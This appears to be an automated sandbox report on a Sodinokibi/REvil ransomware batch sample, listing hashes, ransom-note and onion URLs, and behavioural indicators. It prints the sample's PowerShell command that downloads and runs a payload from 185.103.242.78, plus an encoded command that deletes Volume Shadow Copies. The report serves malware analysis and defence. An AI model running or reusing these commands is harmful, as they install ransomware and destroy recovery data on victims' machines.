Analysis
- max time kernel: 145s
- max time network: 147s
- platform: windows10_x64
- resource: win10v200722
- submitted: 15-08-2020 23:10
Static task: static1
Behavioral task: behavioral1
  Sample: 235620e528e879523640f19c8cb5ee8e.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 235620e528e879523640f19c8cb5ee8e.bat
  Resource: win10v200722
General
- Target: 235620e528e879523640f19c8cb5ee8e.bat
- Size: 219B
- MD5: 3141305118100484c56608118b0125cd
- SHA1: 6130755f363b7419592d3f30e74854847acbde07
- SHA256: 14e3d246bf04730f371e94114788e30bb4a609324dd115e56411f6a5066b8ea1
- SHA512: f81b732613a643ff65706bc9d3c06fdbd2bdd804661e7899c43f11298145a20a1bfd58c48067e0e218eb789c667ae2c62c278094c89599cd74687a01f758295f
Malware Config
- Extracted: http://185.103.242.78/pastes/235620e528e879523640f19c8cb5ee8e
- Extracted: C:\huj40pji59-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4C4D3882405CF52
  http://decryptor.cc/E4C4D3882405CF52
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (57 IoCs)
  Processes (flow, pid, process):
  All 57 flows belong to powershell.exe (PID 576): flows 1, 3, 5, 9, 11, 16, 18, 20, 22, 30, 32, 34, 36, 38, 41, 43, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 66, 67, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99, 101, 103, 105, 107, 109, 111, 113, 115, 117, 119, 121, 123, 126
- Modifies extensions of user files (2 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (description, ioc, process):
  File renamed | C:\Users\Admin\Pictures\NewGrant.raw => \??\c:\users\admin\pictures\NewGrant.raw.huj40pji59 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\OutSend.raw => \??\c:\users\admin\pictures\OutSend.raw.huj40pji59 | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes (description, ioc, process):
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes (description, ioc, process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3emo6z2jao0f1.bmp" | powershell.exe
- Drops file in Program Files directory (16 IoCs)
  Processes (description, ioc, process):
  File opened for modification | \??\c:\program files\CompareExit.xltx | powershell.exe
  File opened for modification | \??\c:\program files\PublishFind.xml | powershell.exe
  File created | \??\c:\program files (x86)\huj40pji59-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\OutWatch.wav | powershell.exe
  File opened for modification | \??\c:\program files\ResizeSelect.png | powershell.exe
  File opened for modification | \??\c:\program files\RevokeImport.wma | powershell.exe
  File opened for modification | \??\c:\program files\UseMove.jfif | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromLimit.WTV | powershell.exe
  File opened for modification | \??\c:\program files\SubmitStart.ADT | powershell.exe
  File opened for modification | \??\c:\program files\ClearUnblock.rm | powershell.exe
  File opened for modification | \??\c:\program files\MeasureGrant.mht | powershell.exe
  File opened for modification | \??\c:\program files\ProtectStart.xml | powershell.exe
  File opened for modification | \??\c:\program files\RedoBlock.html | powershell.exe
  File opened for modification | \??\c:\program files\RestartInstall.rle | powershell.exe
  File opened for modification | \??\c:\program files\SearchTrace.js | powershell.exe
  File created | \??\c:\program files\huj40pji59-readme.txt | powershell.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes (pid, process):
  576 | powershell.exe (5 events)
  1364 | powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege | 576 | powershell.exe
  Token: SeDebugPrivilege | 576 | powershell.exe
  Token: SeDebugPrivilege | 1364 | powershell.exe
  Token: SeBackupPrivilege | 2764 | vssvc.exe
  Token: SeRestorePrivilege | 2764 | vssvc.exe
  Token: SeAuditPrivilege | 2764 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 576 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description, pid, process, target process):
  PID 2608 wrote to memory of 576 | 2608 | cmd.exe | powershell.exe (3 events)
  PID 576 wrote to memory of 1364 | 576 | powershell.exe | powershell.exe (3 events)
Processes
- C:\Windows\system32\cmd.exe (PID 2608)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\235620e528e879523640f19c8cb5ee8e.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 576, child of 2608)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/235620e528e879523640f19c8cb5ee8e');Invoke-YXVVCLYNAQLV;Start-Sleep -s 10000"
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1364, child of 576)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of Volume Shadow Copies, which accounts for the vssvc.exe activity and privileges recorded below.)
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 2764)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken